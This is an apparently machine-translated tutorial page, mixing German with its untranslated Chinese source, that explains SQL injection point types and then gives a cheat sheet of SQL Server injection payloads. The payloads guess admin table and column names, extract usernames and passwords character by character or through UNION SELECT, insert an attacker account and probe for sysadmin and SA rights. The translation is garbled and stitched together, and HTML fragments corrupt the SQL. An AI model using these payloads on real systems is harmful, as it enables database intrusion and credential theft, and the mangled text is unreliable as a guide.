Es gibt drei Arten von SQL-Injection-Anweisungen, nämlich: 1. Numerischer Injektionspunkt mit Anweisungen wie „Wählen Sie * aus Tabellennamen aus, wobei ID=1 und 1=1“ sind. 2. Zeichen-Injection-Punkte mit Anweisungen wie „ Wählen Sie * aus der Tabelle aus, in der Name..."; 3. Injektionspunkt suchen.
Die Betriebsumgebung dieses Artikels: Windows 7-System, SQL Server 2016-Version, Dell G3-Computer.
Allgemeine SQL-Injection-Anweisungen
2. SQL-Injection-Typen
select * from table name where id=1
. Wenn eine Injektion vorliegt, können wir für das Sprengen eine SQL-Injection-Anweisung ähnlich der folgenden erstellen: select * aus Tabelle Name, wobei id=1 und 1=1
select * from 表名 where id=1
若存在注入,我们可以构造出类似与如下的sql注入语句进行爆破:select * from 表名 where id=1 and 1=1
网页链接有类似的结构 http://xxx.com/users.php?name=admin 这种形式,其注入点 name 类型为字符类型,所以叫字符型注入点。这一类的 SQL 语句原型大概为 select * from 表名 where name='admin'
值得注意的是这里相比于数字型注入类型的sql语句原型多了引号,可以是单引号或者是双引号。若存在注入,我们可以构造出类似与如下的sql注入语句进行爆破:select * from 表名 where name='admin' and 1=1 '
我们需要将这些烦人的引号给处理掉。
这是一类特殊的注入类型。这类注入主要是指在进行数据搜索时没过滤搜索参数,一般在链接地址中有 "keyword=关键字"
有的不显示在的链接地址里面,而是直接通过搜索框表单提交。此类注入点提交的 SQL 语句,其原形大致为:select * from 表名 where 字段 like '%关键字%'
若存在注入,我们可以构造出类似与如下的sql注入语句进行爆破:select * from 表名 where 字段 like '%测试%' and '%1%'='%1%'
Der Weblink hat eine ähnliche Struktur http://xxx.com/users . In der Form php?name=admin ist der Namenstyp des Injektionspunkts ein Zeichentyp, daher wird er als Zeicheninjektionspunkt bezeichnet. Der Prototyp dieser Art von SQL-Anweisung ist wahrscheinlich select * from table name where name='admin'
. Es ist erwähnenswert, dass es im Vergleich zum Prototyp der numerischen Injektions-SQL-Anweisung mehr Anführungszeichen gibt. Dies können einfache Anführungszeichen oder doppelte Anführungszeichen sein. Wenn es eine Injektion gibt, können wir eine SQL-Injection-Anweisung ähnlich der folgenden erstellen, um sie zu sprengen: select * from table name where name='admin' and 1=1 '
Wir müssen uns mit diesen lästigen Zitaten auseinandersetzen Markierungen verlieren.
Dies ist eine besondere Art der Injektion. Diese Art der Injektion bezieht sich hauptsächlich darauf, dass die Suchparameter bei der Durchführung von Datensuchen nicht gefiltert werden. Im Allgemeinen ist
"keyword=keyword"
in der Linkadresse enthalten Durchsucht durch Box-Formulareinreichung. Der Prototyp der von dieser Art von Injektionspunkt übermittelten SQL-Anweisung lautet ungefähr:select * from table name where field like '%keyword%'
Wenn eine Injektion vorliegt, können wir eine SQL-Injection-Anweisung ähnlich wie erstellen die folgende Explosion:wählen Sie * aus dem Tabellennamen aus, wobei Felder wie „%test%“ und „%1%“ = „%1%“ sind
Der Injektionspunkt befindet sich in einem bestimmten Feld im HTTP-Anforderungsheader. Beispielsweise ist es im Feld „User-Agent“ vorhanden. Streng genommen sollte Cookie eigentlich als eine Form der Header-Injection betrachtet werden. Denn bei HTTP-Anfragen ist Cookie ein Feld im Header.
1.判断有无注入点 ; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0<>(select count(*) from *) and 0<>(select count(*) from admin) ---判断是否存在admin这张表 3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个 and 0<(select count(*) from admin) and 1<(select count(*) from admin) 4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称. and 1=(select count(*) from admin where len(*)>0)-- and 1=(select count(*) from admin where len(用户字段名称name)>0) and 1=(select count(*) from admin where len(_blank>密码字段名称password)>0) 5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止 and 1=(select count(*) from admin where len(*)>0) and 1=(select count(*) from admin where len(name)>6) 错误 and 1=(select count(*) from admin where len(name)>5) 正确 长度是6 and 1=(select count(*) from admin where len(name)=6) 正确 and 1=(select count(*) from admin where len(password)>11) 正确 and 1=(select count(*) from admin where len(password)>12) 错误 长度是12 and 1=(select count(*) from admin where len(password)=12) 正确 6.猜解字符 and 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位 and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位 就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了 and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) -- 这个查询语句可以猜解中文的用户和_blank>密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符. group by users.id having 1=1-- group by users.id, users.username, users.password, users.privs having 1=1-- ; insert into users values( 666, attacker, foobar, 0xffff )-- UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS WHERE TABLE_blank>_NAME=logintable- UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS WHERE TABLE_blank>_NAME=logintable WHERE COLUMN_blank>_NAME NOT IN (login_blank >_id)- UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS WHERE TABLE_blank>_NAME=logintable WHERE COLUMN_blank>_NAME NOT IN (login_blank >_id,login_blank>_name)- UNION SELECT TOP 1 login_blank>_name FROM logintable- UNION SELECT TOP 1 password FROM logintable where login_blank>_name=Rahul-- 看_blank>服务器打的补丁=出错了打了SP4补丁 and 1=(select @@VERSION)-- 看_blank>数据库连接账号的权限,返回正常,证明是_blank>服务器角色sysadmin权限。 and 1=(SELECT IS_blank>_SRVROLEMEMBER(sysadmin))-- 判断连接_blank>数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA) and sa=(SELECT System_blank>_user)-- and user_blank>_name()=dbo-- and 0<>(select user_blank>_name()--Empfohlen (kostenlos): 🎜SQL-Tutorial🎜🎜
Das obige ist der detaillierte Inhalt vonWas ist eine SQL-Injection-Anweisung?. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!